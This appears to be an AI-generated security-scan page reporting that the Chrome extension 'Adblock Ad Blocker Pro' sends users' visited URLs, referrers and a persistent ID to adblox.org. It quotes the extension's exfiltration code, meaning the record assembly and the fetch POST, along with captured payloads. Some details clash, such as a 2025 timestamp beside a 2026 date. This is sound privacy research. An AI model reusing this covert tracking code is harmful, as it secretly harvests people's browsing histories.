Is Adblock Ad Blocker Pro safe?
Adblock is high risk. On every navigation, Adblock Ad Blocker Pro sends the URL just loaded and the previous URL to adblox.org automatically, no opt-in. Six requests confirmed: google.com, amazon.com, facebook.com visits produced POSTs with URLs in the bodies.…
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Every URL and Referrer Exfiltrated to adblox.org on Every Page Load
On every navigation, Adblock Ad Blocker Pro sends the URL just loaded and the previous URL to adblox.org automatically, no opt-in.
Six requests confirmed: google.com, amazon.com, facebook.com visits produced POSTs with URLs in the bodies.
You load any HTTP or HTTPS page in your browser.
The extension records that URL and the one you came from, encrypts them with a key embedded in its own code, and immediately sends them to adblox.org.
This applies to every site, your banking portal, medical information searches, private business research. There is no allowlist or opt-out.
| Content-Type | application/json;charset=utf-8 |
{
"data": "\"Lp9vQxM3nB7rT2kZwS5cYhJeGiU6DfNoCa8tWxPdKR1mElAOb4Hq=\""
}| Field | Value | Why it matters | |
|---|---|---|---|
URL you visited | https://www.amazon.com/dp/B09BVKF3WL | The full address of every page you loaded, including query parameters that may contain search terms, user IDs, or session tokens. | |
URL you came from | https://www.google.com/search?q=headphones+under+100 | The page you were on before, creates a browsing trail that shows not just what you visited but how you got there. | |
Persistent user ID | 945a0a8f-5d90-4bc7-aace-2fe69c7f72b3 | The same UUID in every request, permanently linking all captured URLs to your browser install. | |
Device timestamp | 1744659198493 | Unix millisecond timestamp of the navigation. |
The POST call and the payload assembly, from the shipping source:
function postToAdblox(payload) {
fetch('https://adblox.org/api_v1/safe_search1.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json;charset=utf-8' },
body: JSON.stringify(payload) // {data: '<base64 AES-GCM ciphertext>'}
});
}const encrypted = await encryptPayload(navigationRecord);
if (encrypted?.request?.enRequest) {
const now = Date.now();
if (now - lastSentTimestamp >= 10_000) { // rate limit: 1 per 10 s
lastSentTimestamp = now;
postToAdblox({ data: encrypted.request.enRequest });
}
}- adblox.org
Receives every navigation record. The /api_v1/safe_search1.php path suggests a safe-browsing check, but the payload holds full URLs/referrers tied to a persistent user ID.
Browsing URLs and Referrers Sent to adblox.org on Every Navigation
Each page load, Adblock Ad Blocker Pro records the visited and referring URL, encrypts them, and POSTs to adblox.org/api_v1/safe_search1.php; absent on new installs, the gate always passes.
The hardcoded AES key decrypted 20 captured POSTs.
You navigate to any HTTP or HTTPS page in Chrome.
The extension packages the URL you visited and the URL you came from, encrypts them, and sends them to adblox.org.
The 'safeSearch' storage flag controls this behavior. When the key is absent, the state for all new installs, the check evaluates to true and the data is sent.
| Content-Type | application/json;charset=utf-8 |
{"data":"\"Yq8mZK3rN2vXpT1sQ7wLbF5cJd0hGiUeA9oRnyMxz4C6OlkBDPsHtWVfEj2gu==""}| Field | Value | Why it matters | |
|---|---|---|---|
URL you visited | https://www.reddit.com/r/privacy/comments/Canary_test_<planted marker> | The full address of the page loaded, including query parameters that may hold search terms, session tokens, or account identifiers. | |
URL you came from | https://www.amazon.com/<planted marker>CANARY | The page you were on before this one. Combined with the visited URL, this builds a chain of your browsing activity. | |
Persistent user ID | 23ca658d-9f7b-4d35-84cf-3c6895813535 | A UUID generated once at install and stored permanently. Every request carries this same ID, linking captured URLs to your install. | |
Device timestamp | 1744659198493 | When the navigation happened, in milliseconds since Unix epoch. | |
HTTP method | GET | The request type for the navigation (e.g. GET). | |
Content type | text/html | The MIME type of the page response, as returned in the server headers. |
The POST body contains a single base64-encoded field called 'data'. The content is encrypted with AES-128-GCM. It cannot be read in your browser's DevTools without knowing the key, but the key is hardcoded in the extension source.
[
{
"fileDate": "2026-04-14T19:13:18.493Z",
"deviceTimestamp": 1744659198493,
"userId": "23ca658d-9f7b-4d35-84cf-3c6895813535",
"referrerUrl": "https://www.amazon.com/<planted marker>CANARY",
"targetUrl": "https://www.reddit.com/r/privacy/comments/Canary_test_<planted marker>",
"requestType": "GET",
"contentType": "text/html",
"statusCode": 200,
"foreground": 1
}
]- adblox.org
Receives every navigation record via POST to /api_v1/safe_search1.php. Name suggests safe-browsing use, but payloads hold full URLs and referrers tied to a persistent user ID.
Full Navigation Records Transmitted to adblox.org via AES-Encrypted POST
On every page load, Adblock Ad Blocker Pro records your URL, referrer, status, content type, method, timestamp, and user ID, encrypts it with a hardcoded AES key, sent to adblox.org. 20 POSTs matched URLs visited. 'safeSearch' defaults on.
You visit any HTTP or HTTPS page in Chrome.
The extension records the full navigation record, URL, referrer, content type, status code, and your persistent user ID, encrypts it, and sends it to adblox.org.
The transmission is rate-limited to one POST every 10 seconds. If two navigations happen within that window, the second is not sent.
| Content-Type | application/json;charset=utf-8 |
{
"data": "\"Lp9vQxM3nB7rT2kZwS5cYhJeGiU6DfNoCa8tWxPdKR1mElAOb4HqsFzWv+Yg=\""
}| Field | Value | Why it matters | |
|---|---|---|---|
URL visited | https://en.wikipedia.org/wiki/Canary_test_<planted marker> | The full address of the page you loaded, including query parameters. | |
Referring URL | https://www.amazon.com/<planted marker>CANARY | The page you were on immediately before, building a navigation trail. | |
User ID | 23ca658d-9f7b-4d35-84cf-3c6895813535 | A UUID assigned once at install and kept permanently. All navigation records from your browser carry this same value. | |
Device timestamp | 1744659198493 | Unix millisecond timestamp of the navigation. | |
HTTP method | GET | The HTTP verb used for the navigation request. | |
Content type | text/html | MIME type of the page response. | |
HTTP status code | 200 | The server's response status for the navigation. |
The payload assembly and POST dispatch from the shipping source:
// Assembles the navigation record from tab state and response headers.
const record = {
fileDate: new Date().toISOString(),
deviceTimestamp: Date.now(),
userId: sv, // persistent UUID from chrome.storage.local
referrerUrl: referrerUrl, // from hv()-maintained tab cache
targetUrl: targetUrl,
requestType: contentMeta.requestType, // HTTP method from webRequest headers
contentType: contentMeta.contentType,
statusCode: contentMeta.statusCode,
foreground: await isTabActive(tabId) // 1 if tab is active, 0 otherwise
};const encrypted = await encryptPayload([record]);
if (encrypted?.request?.enRequest) {
const now = Date.now();
if (now - lastSentTimestamp >= 10_000) { // rate limit: once per 10 s
lastSentTimestamp = now;
postToAdblox({ data: encrypted.request.enRequest });
}
}function postToAdblox(payload) {
fetch('https://adblox.org/api_v1/safe_search1.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json;charset=utf-8' },
body: JSON.stringify(payload)
});
}- adblox.org
Primary recipient of navigation records via /api_v1/safe_search1.php. Also hosts the Sentry endpoint at kent.adblox.org, which receives the userId on extension updates.
+11 more findings not shown
What it can do
Permissions this extension asks for, as declared in version 2.0.17. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Read and change your data on every site you visit
*://*/*
Act on the current tab, but only after you click the extension
activeTab
Block and redirect the requests your browser makes
declarativeNetRequest
Watch every request your browser makes
webRequest
Run its own code inside the pages you visit
scripting
Store data in your browser
storage